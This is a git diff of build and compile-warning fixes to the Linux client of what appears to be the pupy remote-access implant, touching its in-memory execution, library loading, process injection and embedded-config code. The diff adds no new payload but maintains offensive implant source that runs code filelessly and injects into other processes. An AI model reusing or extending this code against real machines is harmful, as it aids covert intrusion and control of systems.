diff --git a/client/lzma/lzmaunpack.c b/client/lzma/lzmaunpack.c index 27af6387..770d4434 100644 --- a/client/lzma/lzmaunpack.c +++ b/client/lzma/lzmaunpack.c @@ -7,13 +7,12 @@ static void _lzfree(void *p, void *address) { p = p; free(address); } static ISzAlloc _lzallocator = { _lzalloc, _lzfree }; static void *lzmaunpack(const char *data, size_t size, size_t *puncompressed_size) { - char *uncompressed = NULL; + unsigned char *uncompressed = NULL; size_t uncompressed_size = 0; - const Byte *wheader = data + sizeof(unsigned int); - const Byte *woheader = wheader + LZMA_PROPS_SIZE; + const Byte *wheader = (Byte *) data + sizeof(unsigned int); + const Byte *woheader = (Byte *) wheader + LZMA_PROPS_SIZE; - CLzmaDec state; ELzmaStatus status; size_t srcLen; int res; diff --git a/client/sources-linux/Makefile b/client/sources-linux/Makefile index b8377ade..e8382531 100644 --- a/client/sources-linux/Makefile +++ b/client/sources-linux/Makefile @@ -1,6 +1,6 @@ CC ?= gcc -CFLAGS := $(shell pkg-config --cflags python-2.7) -I../lzma -fPIC $(CFLAGS_EXTRA) +CFLAGS := $(shell pkg-config --cflags python-2.7) -I../lzma -fPIC $(CFLAGS_EXTRA) -pipe -Wall LDFLAGS := -lpthread -ldl -fPIC $(LDFLAGS_EXTRA) -Wl,-Bstatic -lz -Wl,-Bdynamic PFLAGS := -OO PIE ?= -pie @@ -19,7 +19,7 @@ NAME := 86 endif LINUX_INJECT_CFLAGS := -include debug.h -include fixes.h \ - -Dmain=linux_inject_main "-Drealpath=realpath2" + -Dmain=linux_inject_main "-Drealpath=fakepath" ifneq ($(DEBUG),) DEBUG_ADD := -debug diff --git a/client/sources-linux/daemonize.c b/client/sources-linux/daemonize.c index 6681833f..dac4ad7e 100644 --- a/client/sources-linux/daemonize.c +++ b/client/sources-linux/daemonize.c @@ -1,3 +1,4 @@ +#define _GNU_SOURCE #include #include #include diff --git a/client/sources-linux/decompress.c b/client/sources-linux/decompress.c index 575a0340..8bdcd9a5 100644 --- a/client/sources-linux/decompress.c +++ b/client/sources-linux/decompress.c @@ -9,7 +9,6 @@ int decompress(int fd, const char *buf, size_t size) { int ret; unsigned have; z_stream strm; - unsigned char in[CHUNK]; unsigned char out[CHUNK]; /* allocate inflate state */ @@ -29,7 +28,7 @@ int decompress(int fd, const char *buf, size_t size) { if (strm.avail_in == 0) break; - strm.next_in = buf; + strm.next_in = (unsigned char *) buf; buf += strm.avail_in; size -= strm.avail_in; diff --git a/client/sources-linux/fixes.h b/client/sources-linux/fixes.h index 8a4199b1..c27de2be 100644 --- a/client/sources-linux/fixes.h +++ b/client/sources-linux/fixes.h @@ -1,7 +1,8 @@ #ifndef ___FIXES_H #define ___FIXES_H - +#include +#include #include #ifndef PTRACE_GETSIGINFO @@ -9,8 +10,13 @@ #endif static inline -char *realpath2(const char *path, char *resolved_path) { - return path; +char *fakepath(const char *path, char *resolved_path) { + if (resolved_path) { + strncpy(resolved_path, path, PATH_MAX); + return resolved_path; + } else { + return strdup(path); + } } #endif diff --git a/client/sources-linux/list.c b/client/sources-linux/list.c index ecf479b8..65a77765 100644 --- a/client/sources-linux/list.c +++ b/client/sources-linux/list.c @@ -252,7 +252,6 @@ bool list_remove(PLIST pList, void * data) bool list_delete(PLIST pList, unsigned int index) { bool result = false; - void * data = NULL; PNODE current_node = NULL; if (pList == NULL) diff --git a/client/sources-linux/main_exe.c b/client/sources-linux/main_exe.c index 8774b1ef..1543239c 100644 --- a/client/sources-linux/main_exe.c +++ b/client/sources-linux/main_exe.c @@ -1,9 +1,13 @@ #include "pupy_load.h" #include "daemonize.h" +#include + int main(int argc, char *argv[], char *env[]) { #ifndef DEBUG daemonize(argc, argv, env, true); +#else + mtrace(); #endif return mainThread(argc, argv, false); } diff --git a/client/sources-linux/pupy.c b/client/sources-linux/pupy.c index d09ae254..c53fda86 100644 --- a/client/sources-linux/pupy.c +++ b/client/sources-linux/pupy.c @@ -13,6 +13,7 @@ #include #include "tmplibrary.h" #include +#include #include "memfd.h" #include "resources_library_compressed_string_txt.c" @@ -21,7 +22,7 @@ int linux_inject_main(int argc, char **argv); static const char module_doc[] = "Builtins utilities for pupy"; -static const char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; +static const char pupy_config[32764]="####---PUPY_CONFIG_COMES_HERE---####\n"; static PyObject *ExecError; @@ -36,7 +37,7 @@ static PyObject *Py_get_modules(PyObject *self, PyObject *args) resources_library_compressed_string_txt_size ); - munmap(resources_library_compressed_string_txt_start, + munmap((char *) resources_library_compressed_string_txt_start, resources_library_compressed_string_txt_size); Py_XINCREF(modules); @@ -50,9 +51,10 @@ Py_get_pupy_config(PyObject *self, PyObject *args) { static PyObject *config = NULL; if (!config) { - size_t compressed_size = ntohl( - *((unsigned int *) pupy_config) - ); + unsigned int pupy_lzma_length = 0x0; + memcpy(&pupy_lzma_length, pupy_config, sizeof(unsigned int)); + + ssize_t compressed_size = ntohl(pupy_lzma_length); config = PyObject_lzmaunpack(pupy_config+sizeof(int), compressed_size); @@ -107,8 +109,7 @@ static PyObject *Py_ld_preload_inject_dll(PyObject *self, PyObject *args) ldobject, PyObject_IsTrue(py_HookExit), cleanup, - lpCmdBuffer, - ldobject + lpCmdBuffer ); dprint("Program to execute in child context: %s\n", cmdline); @@ -146,7 +147,6 @@ static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args) uint32_t dwPid; const char *lpDllBuffer; uint32_t dwDllLenght; - const char *cpCommandLine; if (!PyArg_ParseTuple(args, "Is#", &dwPid, &lpDllBuffer, &dwDllLenght)) return NULL; @@ -212,7 +212,6 @@ static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args) static PyObject *Py_load_dll(PyObject *self, PyObject *args) { - uint32_t dwPid; const char *lpDllBuffer; uint32_t dwDllLenght; const char *dllname; @@ -236,7 +235,7 @@ static PyObject *Py_mexec(PyObject *self, PyObject *args) return NULL; Py_ssize_t argc = PySequence_Length(argv_obj); - if (args < 1) { + if (argc < 1) { PyErr_SetString(ExecError, "Args not passed"); return NULL; } @@ -259,7 +258,7 @@ static PyObject *Py_mexec(PyObject *self, PyObject *args) argv[argc] = NULL; int stdior[3] = { -1, -1, -1 }; - pid_t pid = memexec(buffer, buffer_size, argv, stdior, redirected, detach); + pid_t pid = memexec(buffer, buffer_size, (const char **) argv, stdior, redirected, detach); if (pid < 0) { PyErr_SetString(ExecError, "Can't execute"); @@ -297,9 +296,9 @@ static PyMethodDef methods[] = { DL_EXPORT(void) initpupy(void) { - PyObject *pupy = Py_InitModule3("pupy", methods, module_doc); + PyObject *pupy = Py_InitModule3("pupy", methods, (char *) module_doc); if (!pupy) { - return NULL; + return; } ExecError = PyErr_NewException("pupy.error", NULL, NULL); diff --git a/client/sources-linux/pupy_load.c b/client/sources-linux/pupy_load.c index 7fc1e50f..84c43d0a 100644 --- a/client/sources-linux/pupy_load.c +++ b/client/sources-linux/pupy_load.c @@ -65,10 +65,6 @@ uint32_t mainThread(int argc, char *argv[], bool so) { int rc = 0; PyObject *m=NULL, *d=NULL, *seq=NULL; - PyObject *mod; - char * ppath; - FILE * f; - uintptr_t cookie = 0; PyGILState_STATE restore_state; struct rlimit lim; @@ -89,9 +85,9 @@ uint32_t mainThread(int argc, char *argv[], bool so) { ); } - munmap(resources_libcrypto_so_start, resources_libcrypto_so_size); - munmap(resources_libssl_so_start, resources_libssl_so_size); - munmap(resources_python27_so_start, resources_python27_so_size); + munmap((char *) resources_libcrypto_so_start, resources_libcrypto_so_size); + munmap((char *) resources_libssl_so_start, resources_libssl_so_size); + munmap((char *) resources_python27_so_start, resources_python27_so_size); dprint("calling PyEval_InitThreads() ...\n"); PyEval_InitThreads(); @@ -155,7 +151,7 @@ uint32_t mainThread(int argc, char *argv[], bool so) { resources_bootloader_pyc_size ); - munmap(resources_bootloader_pyc_start, resources_bootloader_pyc_size); + munmap((char *) resources_bootloader_pyc_start, resources_bootloader_pyc_size); if (seq) { Py_ssize_t i, max = PySequence_Length(seq); @@ -179,5 +175,5 @@ uint32_t mainThread(int argc, char *argv[], bool so) { PyGILState_Release(restore_state); Py_Finalize(); dprint("exit ...\n"); - return 0; + return rc; } diff --git a/client/sources-linux/tmplibrary.c b/client/sources-linux/tmplibrary.c index 0f7b23b8..88eac84e 100644 --- a/client/sources-linux/tmplibrary.c +++ b/client/sources-linux/tmplibrary.c @@ -168,14 +168,14 @@ set_cloexec_flag (int desc) { return fcntl (desc, F_SETFD, oldflags); } -pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3], bool redirected_stdio, bool detach) { +pid_t memexec(const char *buffer, size_t size, const char* const* argv, int stdior[3], bool redirected_stdio, bool detach) { dprint("memexec(%p, %ull, %d)\n", buffer, size, redirected_stdio); char buf[PATH_MAX]={}; int fd = drop_library(buf, PATH_MAX, buffer, size); if (fd < 0) { dprint("Couldn't drop executable: %m\n"); - return NULL; + return -1; } int p_wait[2]; @@ -229,8 +229,8 @@ pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3] close(p_wait[0]); set_cloexec_flag(p_wait[1]); - fexecve(fd, argv, environ); - execv(buffer, argv); + fexecve(fd, (char *const *) argv, environ); + execv(buffer, (char *const *) argv); int status = errno; write(p_wait[1], &status, sizeof(status)); @@ -287,14 +287,17 @@ pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3] return child_pid; _lbClose3: - if (redirected_stdio) + if (redirected_stdio) { close(p_stderr[0]); close(p_stderr[1]); + } _lbClose2: - if (redirected_stdio) + if (redirected_stdio) { close(p_stdout[0]); close(p_stdout[1]); + } _lbClose1: - if (redirected_stdio) + if (redirected_stdio) { close(p_stdin[0]); close(p_stdin[1]); + } _lbClose0: if (p_wait[0] > 0) close(p_wait[0]); @@ -346,17 +349,12 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) { #ifndef NO_MEMFD_DLOPEN_WORKAROUND if (is_memfd) { - char *fake_path = tempnam("/dev/shm", NULL); - if (!fake_path) { - fake_path = tempnam("/tmp", NULL); - } - if (fake_path) { - if (!symlink(buf, fake_path)) { - strncpy(buf, fake_path, sizeof(buf)-1); - is_memfd = false; + char fake_path[PATH_MAX] = {}; + snprintf(fake_path, sizeof(fake_path), "/dev/shm/memfd:%s", soname); + if (!symlink(buf, fake_path)) { + strncpy(buf, fake_path, sizeof(buf)-1); + is_memfd = false; - } - free(fake_path); } } #endif diff --git a/client/sources-linux/tmplibrary.h b/client/sources-linux/tmplibrary.h index 107d7744..2dcd23d4 100644 --- a/client/sources-linux/tmplibrary.h +++ b/client/sources-linux/tmplibrary.h @@ -6,7 +6,7 @@ void *memdlopen(const char *soname, const char *buffer, size_t size); int drop_library(char *path, size_t path_size, const char *buffer, size_t size); -pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3], +pid_t memexec(const char *buffer, size_t size, const char *const* argv, int stdior[3], bool redirected_stdio, bool detach); #endif /* TMPLIBRARY_H */